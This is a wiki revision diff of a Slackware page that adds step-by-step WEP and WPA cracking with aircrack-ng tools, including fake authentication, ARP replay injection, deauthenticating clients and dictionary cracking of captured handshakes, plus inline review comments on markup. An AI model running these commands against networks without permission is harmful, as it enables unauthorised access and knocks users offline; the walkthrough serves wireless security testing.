slackware:packet_injection

slackware:packet_injection [2011/06/21 23:35] slackslackware:packet_injection [2019/11/07 17:58] (current) – external edit 127.0.0.1
Line 44: Line 44:
 make unload make unload
 </code> </code>
 +
 +====== Cracking WEP ======
  
 Now you should be able to follow the entire [[http://www.aircrack-ng.org/doku.php?id=simple_wep_crack|WEP crack tutorial]] on [[http://www.aircrack-ng.org|aircrack-ng.org]].  But the main steps (drawing heavily on the above tutorial): Now you should be able to follow the entire [[http://www.aircrack-ng.org/doku.php?id=simple_wep_crack|WEP crack tutorial]] on [[http://www.aircrack-ng.org|aircrack-ng.org]].  But the main steps (drawing heavily on the above tutorial):
Line 118: Line 120:
 </code> </code>
  
-4. Terminal 1: use aireplay-ng to do fake authentication with the AP+===== 4. Terminal 1: use aireplay-ng to do fake authentication with the AP =====
  
 In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets. In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
Line 126: Line 128:
 To associate with an access point, use fake authentication: To associate with an access point, use fake authentication:
  
 +<code bash>
  aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0  aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
  
Line 136: Line 139:
 -h 00:0F:B5:88:AC:82 is our card MAC address -h 00:0F:B5:88:AC:82 is our card MAC address
 ath0 is the wireless interface name ath0 is the wireless interface name
 +</code>
  
 Success looks like: Success looks like:
  
 +<code bash>
 18:18:20  Sending Authentication Request 18:18:20  Sending Authentication Request
 18:18:20  Authentication successful 18:18:20  Authentication successful
 18:18:20  Sending Association Request 18:18:20  Sending Association Request
 18:18:20  Association successful :-) 18:18:20  Association successful :-)
 +</code>
  
-5. Start aireplay-ng in ARP request replay mode (terminal 1 again)+===== 5. Start aireplay-ng in ARP request replay mode (terminal 1 again) =====
  
 +<code bash>
  aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0  aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
 +</code>
  
 It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. See the Generating ARPs section for tricks on generating ARPs if your screen says “got 0 ARP requests” after waiting a long time. It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. See the Generating ARPs section for tricks on generating ARPs if your screen says “got 0 ARP requests” after waiting a long time.
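Review bot: the `</code>` added after the "-h ... is our card MAC address" and "ath0 is the wireless interface name" lines closes the block that was opened before the aireplay-ng command, so the entire "Where:" explanation renders as code instead of prose; close the block directly after the command line and keep the parameter explanations as a plain list, the way the WPA section below does with `  * -c 9 is the channel for the wireless network`. The "Success looks like" capture is tool output rather than a shell command, so `<code>` without the `bash` tag would be the more accurate fence for it.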
Line 152: Line 160:
 Here is what the screen looks like when ARP requests are being injected: Here is what the screen looks like when ARP requests are being injected:
  
 +<code bash>
  Saving ARP requests in replay_arp-0321-191525.cap  Saving ARP requests in replay_arp-0321-191525.cap
  You should also start airodump-ng to capture replies.  You should also start airodump-ng to capture replies.
  Read 629399 packets (got 316283 ARP requests), sent 210955 packets...  Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
 +</code>
  
 You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The ”#/s” should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can as low as a 100/second and as high as a 500/second. You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The ”#/s” should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can as low as a 100/second and as high as a 500/second.
  
-6. Terminal 3: Run aircrack-ng to obtain the WEP key+===== 6. Terminal 3: Run aircrack-ng to obtain the WEP key =====
  
 The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps. The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.
Line 164: Line 174:
 Start another console session and enter: Start another console session and enter:
  
 +<code bash>
  aircrack-ng -b 00:14:6C:7E:40:80 output*.cap  aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
 +
 Where: Where:
  
 -b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP. -b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
 output*.cap selects all files starting with “output” and ending in ”.cap”. output*.cap selects all files starting with “output” and ending in ”.cap”.
-To also use the FMS/Korek method, start another console session and enter:+</code>
  
-You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.+You will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.
  
 Here is what success looks like: Here is what success looks like:
  
 +<code bash>
                                               Aircrack-ng 0.9                                               Aircrack-ng 0.9
    
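Review bot: the `</code>` that replaces the "To also use the FMS/Korek method, start another console session and enter:" line closes the block opened before the aircrack-ng command, so the "Where:" paragraph and both option explanations end up inside the code block; move `</code>` to directly after the `aircrack-ng -b 00:14:6C:7E:40:80 output*.cap` line. Dropping the FMS/Korek sentence is right, since no command ever followed it, but the rewritten packet-count sentence removes the "If you are using the PTW attack" qualifier while keeping the PTW figures, so the text no longer says which attack the 20,000 and 40,000 to 85,000 figures belong to; restore that qualifier or name the attack in the sentence.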
Line 188: Line 201:
                        KEY FOUND! [ 12:34:56:78:90 ]                         KEY FOUND! [ 12:34:56:78:90 ] 
       Probability: 100%       Probability: 100%
 +</code>
 +
 +====== Cracking WPA ======
 +
 +===== 1. Put the Wireless Interface into Monitor Mode =====
 +
 +<code bash>
 +airmon-ng start wlan0 9
 +</code>
 +
 +Final number is the channel.  From now on refer to this device as mon0 (because we're using mac80211 drivers).
 +
 +===== 2. Listen for a Handshake =====
 +
 +The handshake is the only interesting and useful part of communication between AP and client.
 +
 +<code bash>
 + airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk mon0
 +</code>
 +
 +Where:
 +  * -c 9 is the channel for the wireless network
 +  * --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
 +  * -w psk is the file name prefix for the file which will contain the IVs.
 +  * mon0 is the interface name.
 +
 +Success looks like this -- notice the "WPA handshake:..." in the top right.
 +
 +<code bash>
 +  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
 +                                                                                                               
 +  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 +                                                                                                               
 +  00:14:6C:7E:40:80   39 100       51      116   14    54  WPA2 CCMP   PSK  teddy                           
 +                                                                                                               
 +  BSSID              STATION            PWR  Lost  Packets  Probes                                             
 +                                                                                                               
 +  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35          116
 +</code>
 +
 +===== 3. (if necessary) Deauthenticate a client to capture a handshake =====
 +
 +You can just wait for a handshake, but if there's a connected client, aireplay can attempt to deauthenticate it, forcing it to re-handshake.
 +
 +<code bash>
 + aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
 +</code>
 +
 +Where:
 +  * -0 means deauthentication
 +  * 1 is the number of deauths to send (you can send multiple if you wish)
 +  * -a 00:14:6C:7E:40:80 is the MAC address of the access point
 +  * -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
 +  * ath0 is the interface name
 +
 +===== 4. Crack the pre-shared key =====
 +
 +<code bash>
 +aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
 +</code>
 +
 +Where:
 +  * -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
 +  * *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.
  
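Review bot: step 1 says to refer to the monitor interface as mon0 and step 2 uses mon0, but the deauthentication command in step 3 ends in ath0; the interface name should be consistent across the section, and the "ath0 is the interface name" bullet should match. In step 4 the option list describes `*.cap` while the command uses `psk*.cap`, so the bullet should name the actual pattern, and the `-w psk` description in step 2 ("the file which will contain the IVs") is carried over from the WEP section even though this capture matters because it holds the WPA handshake shown in the airodump-ng screen. The airodump-ng screen is program output, not a shell command, so `<code>` without the `bash` tag fits it better than `<code bash>`.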
slackware/packet_injection.1308699347.txt.gz · Last modified: 2019/11/07 17:58 (external edit)